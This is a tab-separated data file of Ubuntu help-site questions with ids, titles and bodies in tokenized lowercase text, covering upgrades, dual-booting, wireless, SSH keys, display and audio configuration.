137040	can i suppress the last-minute 'writing to disk ' dialogue when umounting ? ( bash script )	i have a bash script that will copy files over to drives upon insertion and then unmount . the actual copy line is simple : cp $ srcdir/ $ file $ drive and the umount : umount $ drive however , once cp is done and umount is presented , the filesystem still has to finish the job and i 'm presented with this : now , this script for when i need to copy the same files to around 500 usb drives via a 10 usb hub . i already have my own way to notify me which drive needs to be ejected when , and having a million popup windows is very annoying . apart from sending a 'sleep 5s ' command ( which really would n't be too bad ) , is there a way that i can suppress these messages ?
137041	my laptop uses kubuntu 12.04 . it does not connect to my wireless access point ( wap ) . how can i fix this ?	i have a wireless access point at home and i ca n't connect with my laptop which uses kubuntu 12.04 . my wifi access point is configured to hide the ssid and use wpa2 personal encryption .
137049	are there any reasons why i should n't upgrade to 12.04 ?	i did n't get the chance to update and i wanted to make sure my system will not crash . i am not a pro user and i would like some tips for installation . are there any dangerous bugs ? what are the new features and how do you cope with them ? what are the first impressions on ubuntu 12.04 lts precise pangolion ?
137058	how to switch workspace via mouse wheel in 12.04	i had this feature in 11.10 after using a tweak by ubuntu tweak . the new version for 12.04 seems not to have this tweak . how can i get this tweak ?
137061	why does n't printing from windows xp to 12.04 using samba work ?	i have set up my printer to print from windows xp to ubuntu 12.04 . the printer is connected to the computer with windows xp , and is being shared across my home network . the computer with ubuntu 12.04 is connecting using samba . when i try to print it fails to connect to the printer . i get the error : connection failed : nt_status_unsuccessful
137062	problem updating to 12.04	i accidentally exited do-release-upgrade using cmd+c . it was in the middle of doing a mysql upgrade and it was asking me about what it wanted to do with the my.cnf file any suggestions ? really need help with this asap this is what i know is going on at the moment jonny_flowers @ pickles10 : ~ $ ps aux | grep update root 13890 0.0 0.8 147312 71656 ? s 22:46 0:00 /usr/bin/python /tmp/update-manager-nfjl_2/precise -- mode=server -- frontend=distupgradeviewtext 1000 25813 0.0 0.0 9372 884 pts/4 s+ 23:32 0:00 grep -- color=auto update
137064	nfs /exports/media wo n't automount during boot	i 'm using webmin 1.580 with ubuntu 12.04 and created an nfs export ( export/media ) which works perfectly fine after manually enabling the export , but when i reboot the system it tells me that it is unable to mount it , and i need to skip it in order to resume booting . how can i find out the root cause of this problem ?
137067	wubi install partition and windows mbr	i am little afraid of messing up my windows 7 dual boot mbr ( i have 2 windows 7 installed ) , which allow booting into either on bootup . my first question , is whether the ubuntu loader , is included with the 2 windows 7 selections on the mbr , or if it the ubuntu loader is available through some other means , with a ubuntu & windows selection , and then the windows selection taking you to the dual boot windows 7 selections ? my second question , is selecting the actual location to install ubuntu . all of the write ups advise you select the drive ( but did n't mention being able to select a partition on a drive ) . i would like to install it to one of my partitions on my 2nd drive , where however if only a drive is available , then i assume it will install it into windows/programs ? my last question , is that when uninstalled , i assume it removes the ubuntu loader selection from whereever it is loaded from , per my first question above ?
137073	why when trying to install files do i get the message `` this file could not be read '' ?	not long ago i changed from windows 7 to ubuntu . i had some troubles , everything installed normally ; the problems came after installing it . but the most important , it 's my problem when installing any file , there is always an error message `` this file could not be read '' please help me . i really like ubuntu , but this is so hard to handle and i need some professional support .
137081	i just can not seem to partition ... ( windows vista )	all day i have been trying to partition my 285.62 gb hard drive on my laptop . i tried to disable hibernation and disabling swap ( i.e paging ) , but it still does n't work . after doing both of those , and restarting , i still have 3806 mb of available shrink space according to disk management . any tips please ? or will ubuntu automatically partition my hard drive anyway ? more information : i have ubuntu already installed on my comp ( only boot-able from a cd at the moment ) i want to have at least 50 gb set away for ubuntu , yet the disk manager only allows for 3 gb . i have an hp pavilion dv6 laptop i do n't know what more you want ?
137082	how can i get the computer to sleep while at the login screen ? ( no users logged in . )	i have my computer set to `` suspend when inactive for 30 minutes '' in system settings . this function works fine if a user is logged in and does not do anything for 30 minutes . however , if all users are logged out and the computer is at the lightdm login screen , the computer will never go to sleep . how do i get the computer to sleep even if no users are logged in ?
137083	what happens when i connect to a remote host via ssh ?	i take classes at the university of pittsburgh and i need to do my work in the universities linux terminal remotely . i use the command ssh usr @ thot.cs.pitt.edu and i 'm prompted for my password to login . all of this works well and i know how to use simple command line arguments to navigate but im not really clear on whats going on here since it wasnt really explained by the ta . what exactly is `` thot.cs.pitt.edu '' ? when i 'm entering commands and creating files etc are they being executed on my machine ? lastly when i 'm logged in why am i not able to run ubuntu programs like gedit or access files that are on my computer ?
137085	diablo ii resolution hack error	hi i recently installed diablo ii and wanted to use the mod to allow higher resolutions . installation went great and everything is setup but when i try to load it via the executable i get this error p11-kit : could n't load module : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : /usr/lib/i386-linux-gnu/pkcs11/gnome-keyring-pkcs11.so : can not open shared object file : no such file or directory fixme : msvcr90 : __clean_type_info_names_internal ( 0x1000a3e0 ) stub any suggestions would be greatly appreciated
137087	is gcc portable between all 64 bit linux machines	i 'm doing work remotely by connecting to a linux terminal with ssh . the machine i 'm connecting to is a 64 bit x86 linux machine . my computer is also 64 bit ubuntu machine with an x86 processor . i need to hand in program assignments that compile with gcc and run on remote machine or they will not be graded . the professor mentioned that gcc may compile programs differently on different machines and that c not completely portable like java . my question is can i write my programs in gedit and debug them with gdb on my computer and upload them with scp ( if i do the work by sshing into the remote unix terminal i can only use nano/pico/vim ) ? or will my computer compile differently then the remote machine ? again , they are both x86 64bit linux machines .
137090	how to use animations as window effects in compiz ?	i recently installed the compiz-plugins-extra in ubuntu 12.04 , and i have animations add-on enabled , but none of the extra features ( such as airplane , dissolve , explode , etc . ) work . is there something else i need to install to make these work or what ?
137091	how to disable icon fetching in dashboard 's search ? ( increasing performance idea )	there seems to be lag whenever i start typing something in dashboard search , looking for an application . this could potentially be very fast , like typing win `` dwar '' enter , runs dwarf fortress . but there 's a lag while typing `` dwar '' , starting on the letter `` d '' . i believe this lag is caused by the system fetching the icons . i 'd like to disable this function and have the dashboard be text-only . note : the hud only has to show one icon at a time and look how much faster that is ? it must be the icons . suggestions ? edit : note that i 'm currently running ubuntu 2d .
137094	tunneling & bypass proxy	are there any software for ubuntu to tunneling/bypass proxy ( http/s , sock4/5 ) . like `` proxifier '' on windows ?
137096	how to embed a gtkaboutdialog 's content in a gtknotebook widget	i 'm writing a python app that is tab-based , and i do n't want it to have any additional pop-up dialogs . i 'd like to use the gtk.aboutdialog functionality , but i do n't want it to appear as a separate window . rather , i 'd like it to be embedded in one of the tabs of my gtk.notebook ( which i 've created with glade ) . i could not find any obvious way to do this . does anyone have any pointers ?
137097	how do i use dfeet ?	i 've been trying for a half hour to get d-feet to open a service , any service with the connect button . i feel i am misunderstanding this application at a basic level . what am i missing ?
137099	materials for improving coding skills and adapting programs	how can i find and adapt the source code for ubuntu programs , and what resources are there for improving my programming knowledge in any language ? i would like to improve my programming skills so that i can contribute to ubuntu .
137100	how to mount a subdirectory of `/home` without making it appear as removable ?	in my present configuration , my /home lives on a regular spinning hard drive , with the exception of /home/mac/runtime which is a partition from a ssd . my problem is that such partition shows up as a `` removable device '' even if the mount options are such that is not possible for the user to unmount it at all ( besides , it is not a removable device , given that it is a partition of an internal hard drive ! ) . indeed my goal would be for the partition layout to be totally transparent ( my /boot is on another disk too , but the user would n't know , and the /boot does n't appear as a removable drive ) . the portion of my /etc/fstab of interest looks like this : # /home was on /dev/sdb1 during installation uuid= < my-uuid-here > /home ext4 noatime , nodiratime 0 2 # /home/mac/runtime was on /dev/sda3 during installation uuid= < my-uuid-here > /home/mac/runtime ext4 noatime , nodiratime 0 2 thank you in advance for your help !
137101	is it normal for 12.04 to occupy almost 4gb ?	i 'm using a asus eeepc 901 and have some basic questions/issues . i installed 12.04 on the 4gb drive , selecting the option to erase it before doing so . immediately after the installation i saw that update manager had over 100 updates pending . i attempted to install these , but was told that i had less than 100 mb remaining . does the os occupy all the other space ? it seems that the best solution is to install 12.04 on the 16gb drive . is this true ? if i do this , what is the best way to erase the 4gb drive afterwards ?
137103	can global application menu be made to behave better with gimp ?	i actually like the global menu of unity . however , for gimp , it 's totally broken and terrible . gimp uses multiple unassociated windows for its toolbars , and as soon as a toolbar gets focus the global menu disappears because the window the menu belongs to is not focused . so you have to switch focus back to the main image window . it 's painful because you need to alternate between using toolbars and using the menu all the time , but every time you use the toolbars the menu disappears . my question : is there any way to improve this behaviour in gimp ? eg , by not having the toolbars as separate windows , or by setting compiz so it does n't treat them as such ? or failing that , how can i disable the global menu just for one application ? using precise , with gimp 2.6.12-1ubuntu1
137110	blue imac running debian will not boot ubuntu from cd drive	i have a older blue imac that is running debian linux . ( an old version of about 3 years ago without update . does n't run well after loading ) at the choice of loading linux from from hd or cd , i choose cd , then the program drops down to cd ... , and then nothing . the ubuntu cd is from this site . i tried desktop and also server . nothing . how do you mend a broken prompt ?
137112	added resolution not working	xrandr commands are not looking as they should . when i type xrandr in terminal it 's says 1280x1024 but it does n't fit in the screen ( wich is 1280x1024 ) . there is a side in black . first of all the monitor supports it ! it worked always , until i upgrade to 12.04 . the system keeps telling me it 's in the right resolution . the drivers are ok too .
137117	how do i launch a bash script using a keyboard shortcut ?	just like the title says , how do i launch a bash script in my ~/downloads folder using a keyboard shortcut ? i 've tried binding cd ~/downloads & & ./bash-script.sh to different accelerators ( ex . the `` tools '' button or music player button on my keyboard , and f4 ) but no luck , yes the script is marked executable , i am trying to do this under `` custom shortcuts '' in system settings - > keyboard , and the command works in terminal .
137126	how are the values of $ uid generated ?	on executing 'echo $ uid ' in terminal , the output is : 0 for root user 1000 for admin ( in my case ) 119 for guest user . how are these values generated ?
137128	i need help installing java	i recently dual booted ubuntu and windows vista on my laptop and everything is running smoothly . the only problem is i am unable to install java ( i have no clue where to even start ) . i am completely new to ubuntu so be specific if you may . i have already installed the jdk runtime enviroment or whatever from the software store or whatever ubuntu calls it . nothing has worked . if you are wondering , i want to play runescape on ubuntu .
137138	where is the multichannel/coaxial/spdif configuration option in ubuntu 12.04 ?	i recently switched from 10.04 to 12.04 . i did a fresh install . however i ca n't configure 5.1 surround with my coaxial/spdif home teather , simply because the new sound manager interface does n't provide options like in 10.04 . in 10.04 i could configure 'digital output + analogic input ' and everything was ok , but in 12.04 i ca n't do this . how can i change the configuration ?
137140	pitivi wo n't render in 12.04	i 've recently upgraded 11.10 to 12.04 and then reinstalled pitivi and gstreamer codecs ecxept the extra codecs and regardless of which container , vid codec or aud codec the rendering bar would n't move any help would be helpful , and if your wondering if it used to work in 11.10 it only work in the first few tries before it also stopped rendering . p.s : i 'm still a nooby .
137146	what is the default password of the uec image ?	i 'm running some instances using ubuntu image 10.04 on openstack . here is the link : https : //uec-images.ubuntu.com/releases/10.04/release/ i can use the private key to ssh to these instances , it 's ok . but i do n't know the default password to vnc to these instance . so what is it ?
137148	does wine 1.4 on ubuntu 12.04 have an application launcher menu like it used to on 10.04 ?	previously on 10.04 it was located in the upper left corner sub menu . if so , where did it go ?
137149	why is the software center not alphabetized ?	would be so much better if it were , especially for n00bies .
137151	how does one create a custom application launcher for wine installed apps ?	i 'm able to locate stuff with the dash home then drag it down to the launcher bar on the left of the desktop , but what if the application installed via wine is n't found via the dash search ? i 've right clicked on the application in the .wine directory and found no options to create a launcher either .
137152	how can ubuntu dash find files & folders which are not in my home folder ?	though through dash i can find all my file & folders which are in my home folder partition of my hard disk . but in one of my hard disk partition i have kept all my movies , & i cant never find them . if they appear they only appear as recently played , but i want them to show permanently , like they show from my videos in home folder .
137154	how does one recreate a custom application launcher that takes command line syntax and even perhaps parameters ?	i had some custom scripts that i had custom launchers for on my desktop on 10.04 . i would like to recreate that again after migration to 12.04 , but unity seems quite foreign to me .
137155	why ca n't i connect to unsecure open wireless networks ?	i have an open , unsecured router which i can connect to without any issues while in windows . when i am in ubuntu , if i click on my wireless manager to see all the networks , then it shows all the secured networks around me but does not show my unsecured one . i looked all over the place for a setting that could maybe filter out open networks and not show them . but i did not find anything . i do not know what is going on . i often use the networks at starbucks and hotels because i travel a lot . this is going to be a big problem for me . can someone please point me in some direction ? i am using ubuntu 10.04 with all updates applied and installed . i 'm also using a hawkings wireless usb card . it uses the rt73 drivers that come installed default .
137159	missing some tray icons in 12.04 unity	i did a partial upgrade yesterday , and noticed that some of my tray icons ( pidgin , artha so far ) had disappeared . i followed the instructions basde on this post but it did n't work . is there another way to retrieve my missing tray icons ? both pidgin and artha are important to me especially the tray indicator feature .
137160	window does n't stay in a position ( precise , classic )	although i 've started to see this phenomenon after i upgraded my notebook from oneiric to precise , i 'm not sure what is influencing . ( 1st one of the following image ) i dragged the window on right to the bottom . then while i move around cursor , ( 2nd image ) the window moves back to the top rim . in this example the one on left remains at the bottom for some reason . and this can happen to other application window ( e.g . firefox , system monitor etc . ) any idea ? ? ( environment ) nvidia driver version : 295.40 , gnome classic ( when using ubuntu as a desktop style , this issue did n't occur )
137162	is the wireless driver from live usb different from the standard install ?	linux newbie here . i 've been trying to use ubuntu ( x64 ) as my main os since 11.10 , but my wireless connection on it has been very unstable , droping every other 5-10 mins . for this reason i see myself forced to use windows 7 ( dual booting ) , where connection works flawlessly -- which really bothers me . my card is an atheros 9k , which claims a reasonable amount of wireless complaints on ubuntu forums . i 've tried every suggestion given on past questions to this site but to no avail . however , while running ubuntu live usb for some of the tests , i noticed that my wireless connection never failed on it and wondered if its network configuration differs from the one on the default ubuntu install . if this is the case , how could i reproduce the live usb network environment on my hard drive install ?
137165	git ssh : permission denied ( publickey )	i tried to use github so i followed the help doc . but when i used this command : ssh -vt git @ github.com i got error like this : jacos @ jing : ~/.ssh $ ssh -vt git @ github.com openssh_5.8p1 debian-7ubuntu1 , openssl 1.0.0e 6 sep 2011 debug1 : reading configuration data /home/jacos/.ssh/config debug1 : applying options for github.com debug1 : reading configuration data /etc/ssh/ssh_config debug1 : applying options for * debug1 : connecting to ssh.github.com [ 207.97.227.248 ] port 443. debug1 : connection established . debug1 : identity file /home/jacos/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/jacos/.ssh/id_rsa-cert type -1 debug1 : identity file /home/jacos/.ssh/id_dsa type -1 debug1 : identity file /home/jacos/.ssh/id_dsa-cert type -1 debug1 : identity file /home/jacos/.ssh/id_ecdsa type -1 debug1 : identity file /home/jacos/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.1p1 debian-5github2 debug1 : match : openssh_5.1p1 debian-5github2 pat openssh* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_5.8p1 debian-7ubuntu1 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group debug1 : ssh2_msg_kex_dh_gex_init sent debug1 : expecting ssh2_msg_kex_dh_gex_reply debug1 : server host key : rsa 16:27 : ac : a5:76:28:2d:36:63:1b:56:4d : eb : df : a6:48 debug1 : host ' [ ssh.github.com ] :443 ' is known and matches the rsa host key . debug1 : found key in /home/jacos/.ssh/known_hosts:4 debug1 : ssh_rsa_verify : signature correct debug1 : ssh2_msg_newkeys sent debug1 : expecting ssh2_msg_newkeys debug1 : ssh2_msg_newkeys received debug1 : roaming not allowed by server debug1 : ssh2_msg_service_request sent debug1 : ssh2_msg_service_accept received debug1 : authentications that can continue : publickey debug1 : next authentication method : publickey debug1 : offering rsa public key : /home/jacos/.ssh/id_rsa debug1 : remote : forced command : gerve gnijuohz 54 : da : c2 : c1 : ca:4a : b9:4d:21:10:5b:42:3f:5a:8e : f7 debug1 : remote : port forwarding disabled . debug1 : remote : x11 forwarding disabled . debug1 : remote : agent forwarding disabled . debug1 : remote : pty allocation disabled . debug1 : server accepts key : pkalg ssh-rsa blen 279 agent admitted failure to sign using the key . debug1 : trying private key : /home/jacos/.ssh/id_dsa debug1 : trying private key : /home/jacos/.ssh/id_ecdsa debug1 : no more authentication methods to try . permission denied ( publickey ) . agent admitted to sign using the key ? no more authentication methods to try ? can someone explain what 's wrong here ? thanks .
137172	how to remap super ( left ) key to control key	could anyone please tell me how to remap my super ( left ) key to ctrl key ? i mean super ( left ) should work as ctrl key..
137173	ubuntu 12.04 upgrade , on going to previous version of linux , ubuntu does n't boot	i upgraded my ubuntu 11.10 to 12.04 . it had kernel version 3.2.0-24 and i went to the `` previous linux version '' where i selected kernel version 2.6.38-11 option in the operating system options . after that whenever i start the machine , it shows startup ubuntu image and gets stuck to that . nothing happens after that . i can go to the user shell and use commands . i ca n't use the graphical interface . how can i change the kernel version back to the 3.2.0-24 ? or is there any other way to solve this problem ?
137175	local development lamp server : routing external requests through socks proxy	i 've got a ( virtualized ) local lamp server on xubuntu 12.04 that i am using for drupal development . i 'd like to learn how to use web 2.0 integration drupal modules ( eg . youtube , facebook , etc . ) but i live in china so these sites are obviously blocked . i use ssh tunneling and a local socks proxy for browsing these sites , but i am not sure how to make my virtualized apache2 server use this proxy . i can see 3 potential solutions but i 'm not really sure how to best go about implementing them . ( in order of preference , i prefer limiting the traffic sent through the ssh tunnel to only what needs to get around the firewall ) set up ssh tunnel from guest os get apache2 server to route external traffic ( or even better , only external traffic with specific host names , eg . facebook.com , youtube.com ) through the local socks proxy . set up ssh tunnel from guest os , route all traffic through local socks proxy ( easy with ubuntu but looks like configuring a global socks proxy might be a touch harder with xubuntu because it does n't have ubuntu 's network proxy gui ) make virtualbox on host os route all traffic through socks proxy . any ideas on which route would be best and how to implement it ? thanks in advance for any help !
137181	correcting /var permissions to it 's original state	ok i just royally screwed up my /var folder 's permissions . i thought i was inside /var/www and did a chmod xxx ./* on the parent folder /var instead . now all the permissions inside /var are messed up . what can i do to correct it ?
137182	how to get a proxy for dbus object that is not well known ?	i 'm endeavouring to use dbus to react to a particular signal ( user clicks on an appindicator menu on the unity top panel ) . from using dbus-monitor , i 've found the relevant signal that i 'd like to react to : sender=:1.96 - > dest=:1.232 serial=2091 path=/org/ayatana/notificationitem/myapp/menu ; interface=com.canonical.dbusmenu ; member=abouttoshowgroup array [ int32 9 ] then my plan was to do the following with python : dbus_proxy = bus.get_object ( `` bus.name '' , `` path '' ) interface = dbus.interface ( proxy , `` interface '' ) interface.connect_to_signal ( `` signal '' , my_function ) def my_function : # react in order to understand dbus , i 've been using the following two articles : the dbus-python tutorial and how to read dbus-monitor output ? however , i 'm a bit confused as to what values i should be using for bus name , path , interface and signal in my code . i 've tried poking around in qdbus in order to work out the correct values , but i ca n't seem to find what i 'm looking for . i think i 've been thrown off because get_object requires a `` well-known '' name , but all i 've got is the numerical unique identifiers for sender , dest . any nudge in the right direction would be greatly appreciated .
137184	grub not loading ?	so i got fed up with windows vista and decided to install ubuntu . my roommate has the 11.10 version and so that is what i installed . i 've used ubuntu 10.04 and 10.10 on a different computer before so i thought i would n't have any problems . well , after i wiped the hard drive it started installing ubuntu . it restarted and when it restarted the bios window came up . then , after the bios loaded it just has a blank screen with a blinking cursor in the upper left and stays that way . grub does n't even come up so i ca n't do anything . i 've already googled it and i have not been able to find an answer . anybody know what 's up ? i could just simply reinstall it but i 'm guessing the same thing will happen .
137189	why does the system become laggy when connected to internet ?	why when i connect my netbook to the internet via lan or wifi does whole system becomes laggy ? even when in idle , the cpu monitor shows 100 % usage when connected . i 've had this problem about half a year now , since i installed ubuntu 11.10 . i 'm currently using ubuntu 12.04 lts on a toshiba nb-105 satellite netbook with 1 gb ram and a 1 ghz intel atom processor . here 's my syslog : $ tail -n 30 /var/log/syslog may 23 02:45:28 jesselan-nb-105 kernel : [ 17552.933099 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled may 23 02:45:28 jesselan-nb-105 kernel : [ 17552.935345 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed may 23 02:45:28 jesselan-nb-105 kernel : [ 17552.935360 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through may 23 02:46:20 jesselan-nb-105 kernel : [ 17604.643371 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled may 23 02:46:20 jesselan-nb-105 kernel : [ 17604.649520 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed may 23 02:46:20 jesselan-nb-105 kernel : [ 17604.649547 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through may 23 02:47:11 jesselan-nb-105 kernel : [ 17656.349121 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled may 23 02:47:11 jesselan-nb-105 kernel : [ 17656.351373 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed may 23 02:47:11 jesselan-nb-105 kernel : [ 17656.351392 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through may 23 02:48:03 jesselan-nb-105 kernel : [ 17708.069032 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled may 23 02:48:03 jesselan-nb-105 kernel : [ 17708.071240 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed may 23 02:48:03 jesselan-nb-105 kernel : [ 17708.071254 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through may 23 02:48:55 jesselan-nb-105 kernel : [ 17759.901056 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled may 23 02:48:55 jesselan-nb-105 kernel : [ 17759.903757 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed may 23 02:48:55 jesselan-nb-105 kernel : [ 17759.903774 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through may 23 02:49:48 jesselan-nb-105 kernel : [ 17812.913124 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled may 23 02:49:48 jesselan-nb-105 kernel : [ 17812.915338 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed may 23 02:49:48 jesselan-nb-105 kernel : [ 17812.915365 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through may 23 02:50:40 jesselan-nb-105 kernel : [ 17864.205232 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled may 23 02:50:40 jesselan-nb-105 kernel : [ 17864.207449 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed may 23 02:50:40 jesselan-nb-105 kernel : [ 17864.207461 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through may 23 02:51:34 jesselan-nb-105 kernel : [ 17918.353070 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled may 23 02:51:34 jesselan-nb-105 kernel : [ 17918.355337 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed may 23 02:51:34 jesselan-nb-105 kernel : [ 17918.355347 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through may 23 02:52:25 jesselan-nb-105 kernel : [ 17969.913237 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled may 23 02:52:25 jesselan-nb-105 kernel : [ 17969.915480 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed may 23 02:52:25 jesselan-nb-105 kernel : [ 17969.915506 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through may 23 02:53:17 jesselan-nb-105 kernel : [ 18021.721949 ] sd 6:0:0:0 : [ sdb ] test wp failed , assume write enabled may 23 02:53:17 jesselan-nb-105 kernel : [ 18021.724196 ] sd 6:0:0:0 : [ sdb ] asking for cache data failed may 23 02:53:17 jesselan-nb-105 kernel : [ 18021.724210 ] sd 6:0:0:0 : [ sdb ] assuming drive cache : write through following agc93 's suggestion to check what running processes are the most cpu-intensive , it looks like it is the gwibber.service followed by google chrome and ubuntu one . what should i do about that ?
137192	ubuntu upgrade to 12.04 : system crashed	during upgrading from 11.10 to 12.04 the computer crashed . now i can not start the computer in a normal way anymore . i get a 'unix-like screen ' where i can type commands , but i have no idea what to do . i have a cd-rom with version 11.10 but that does not start either and i have no idea how to access the cd-drive .
137195	enviroment variables are not loaded	i use qt creator to manage my c++ codes on xubuntu 12.04 lts . i have a bunch of environment variables defined in .bashrc_vars that are loaded in .bashrc . these variables are required for building my application and i need qt creator to load them on start up . if i start qt creator from terminal , the variables are loaded but when i click on the icon they do n't . how can i fix this ?
137196	no 'hardware ' tab in audio and no profiles	if i run the 12.x ubuntu ( latest may 2012 ) from the cd , i get full audio settings , and sound playing in speaker . profiles let me change analog to digital in/out . once i run install from the same cd onto the laptop hd , once it boots the first time , after selecting audio settings , there is no 'hardware ' tab and no way to change profiles . worst part is the audio device is set to spdif so nothing comes out of the speakers . very off how booting off the cd i can get analog audio , and installing to hd and booting seems to limit the profile to something useless . laptop is a 5 year old dell d820 with nvidea 128meg video on a 1920x1200 screen and t7200 cpu . i suspect if i could get the damn hardware tab back in audio settings , i could just select the proper analog profile - just as is the case if running from a boot cd . searched the web , no similar problems found ... any help appreciated !
137198	no luck dual booting	i solved one problem only to get a follow-up problem . i have win 7 and i tried loading 32-bit ubuntu 11 on the system . it kept failing . i figured out due to another post here that it was because my 3tb drive was too much for it . after repartitioning the hd my friend and i managed to load it onto the system , but it was buggy when it came to updates , so i tried upgrading to ubuntu 12 ( 32 bit ) , but i was still having the too many bits problem . plus now it seems like something is wrong with loading anything . both win 7 and ubuntu are there , but neither will load . i get a mostly blank screen with the words : **error : no such device : 3a0d062c-5f69-4635-9c79-3814c7d5bbed grub rescue > ** ( with what appears to be a command prompt ) i loaded u12 , 64 bit version , in the hopes it would repair the boot issue . everything appeared to install much more smoothly this time and update nicely , but there was no luck in the boot department . again , all the data is there , but i 'm still getting the black screen when i boot up . i 've also tried the repair function in win 7 with the install disk and no love . i can run from a livecd , but that 's still not getting me win 7 or an installed version of ubuntu . i have confirmed both os are there . whatever prompts them to actually start seems to be the missing element . thank you in advance . i 've tried the terminal commands mentioned below . i get to the third command and : ubuntu @ ubuntu : ~ $ sudo mount /dev/sdb3 /mnt ubuntu @ ubuntu : ~ $ sudo mount ~bind/ dev/mnt/dev mount : mount point dev/mnt/dev does not exist ... ubuntu @ ubuntu : ~ $ sudo mount /dev/sdb3 /mnt mount : /dev/sdb3 already mounted or /mnt busy mount : according to mtab , /dev/sdb3 is already mounted on /mnt ... ubuntu @ ubuntu : ~ $ sudo mount ~bind dev /mnt/sdb3 usage : mount -v : print version ... ubuntu @ ubuntu : ~ $ sudo mount -- bind/proc/mnt/sdb3 mount : unrecognized option ' -- bind/proc/mnt/sdb3 ' usage : mount -v : print version ... ubuntu @ ubuntu : ~ $ sudo mount -- bind/proc /mnt/proc mount : unrecognized option ' -- bind/proc ' usage : mount -v : print version ...
137204	ubuntu 12.04 installed on hard disk using usb pendrive does not boot from hard disk	i installed ubuntu 12.04 using usb pendirve but it only boots if that usb is connected . it does not boot from the hard disk . any solutions ?
137209	netbeans 7.0.1 does n't start new line when pressed enter	04 , and when i open my php project and scan completes a bar appears with `` please wait ... '' written on it . as i understood from reading forums etc that 's the problem with the enter key .
137216	ubuntu running slowly after installation and also hangs	i just installed ubuntu 12.04 lts on my machine alongside windows 7 . after that , ubuntu runs slowly on my system and sometimes it hangs . what could be the problem ? system specification : memory : 1 gb ram hard disk : 250 gb processor : : intel core 2 duo ( 2.53 ghz ) graphics card : 256 mb intel integrated graphic card motherboard : intel dg31pr chipset my system information is given .
137221	the fn key wont work on toshiba satellite l735 ?	the fn key wont work on toshiba satellite l735 on ubuntu 12.04 so anyone can help me please ? ? ?
137224	why pay more for ubuntuuser as emagazin ?	why do i have to pay 8,40 âź for the electronic version of german ubuntuuser magazin on ubuntu software center if i get a printed version for only 7,90 âź . should n't it be vice versa ? that does n't seem to be a fair price to me since you do n't even get a cd and specials with the electronic version !
137232	nvidia dual monitor configuration gets lost every time i reboot	i 've recently updated ( well , borked then completely reinstalled ) to 12.04 . i 'm running a dual monitor setup , with a dell u2410 / dell 2007wfp combination on an hp elite book 8560w . the graphics card is an nvidia gf108 [ quadro 1000m ] . my problem is as follows . i can get the dual monitor setup working fine , but every time i reboot , my machine appears to lose the settings ( specifically , the u2410 is disabled , the mouse pointer is locked in the launcher ) . i have to restate the settings after every launch . i 've tried running nvidia-settings as sudo , i 've save the changes to my xorg.conf file ( see below ) but nothing seems to be sticking . has anyone had similair issues , or know of a fix ? conf file follows : # nvidia-settings : x configuration file generated by nvidia-settings # nvidia-settings : version 295.33 ( buildd @ allspice ) fri mar 30 15:25:24 utc 2012 section `` serverlayout '' identifier `` layout0 '' screen 0 `` screen0 '' 0 0 inputdevice `` keyboard0 '' `` corekeyboard '' inputdevice `` mouse0 '' `` corepointer '' option `` xinerama '' `` 0 '' endsection section `` files '' endsection section `` inputdevice '' # generated from default identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/psaux '' option `` emulate3buttons '' `` no '' option `` zaxismapping '' `` 4 5 '' endsection section `` inputdevice '' # generated from default identifier `` keyboard0 '' driver `` kbd '' endsection section `` monitor '' # horizsync source : edid , vertrefresh source : edid identifier `` monitor0 '' vendorname `` unknown '' modelname `` dell 2007wfp '' horizsync 30.0 - 83.0 vertrefresh 56.0 - 76.0 option `` dpms '' endsection section `` device '' identifier `` device0 '' driver `` nvidia '' vendorname `` nvidia corporation '' boardname `` quadro 1000m '' endsection section `` screen '' identifier `` screen0 '' device `` device0 '' monitor `` monitor0 '' defaultdepth 24 option `` twinview '' `` 1 '' option `` twinviewxineramainfoorder '' `` dfp-1 '' option `` metamodes '' `` crt : 1680x1050 +1920+0 , dfp-1 : 1920x1200 +0+0 ; crt : nvidia-auto-select +0+0 , dfp-1 : null '' subsection `` display '' depth 24 endsubsection endsection the error message i 'm getting is this : none of the selected modes were compatible with the possible modes : trying modes for crtc 642 : crtc 642 : trying mode 3600x1080 @ 50hz with output at 1280 x 1024 @ 0hz ( pass 0 ) crtc 642 : trying mode 3600x1080 @ 50hz with output at 1280 x 1024 @ 0hz ( pass 0 ) crtc 642 : trying mode 3600x1080 @ 